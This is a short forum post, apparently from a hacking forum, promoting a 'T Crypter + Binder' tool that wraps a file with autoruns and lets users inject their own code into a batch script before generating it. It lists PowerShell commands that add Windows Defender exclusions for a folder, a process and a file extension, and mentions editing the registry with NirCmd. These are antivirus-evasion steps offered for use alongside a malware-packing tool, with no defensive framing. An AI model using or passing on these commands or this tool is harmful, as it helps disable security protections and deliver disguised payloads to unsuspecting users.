King
Administrator
- Joined
- Jul 12, 2021
- Messages
- 25,005
- Reaction score
- 5
- Points
- 38
Steps: Launch Program >> Select Number Of Autoruns >> Navigate and edit "program.bat" script >> Generate your file.
You can inject your own code in start or at the end of the program.bat file before generating file.
NIRCMD Utility Tool is included !
You can edit registry with NIRCMD etc ..
Code:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNirCmd Command Reference
or just use some built in commands
Example:
Code:
Code:
powershell -Command Add-MpPreference -ExclusionPath "C:\tmp"
powershell -Command Add-MpPreference -ExclusionProcess "java.exe"
powershell -Command Add-MpPreference -ExclusionExtension ".java"
powershell -Command Remove-MpPreference -ExclusionExtension ".java"
Make sure to put your file in same directory of "T Crypter + Binder" program, Import and generate!
Demo:
You can check samples directory after downloading
Continue reading...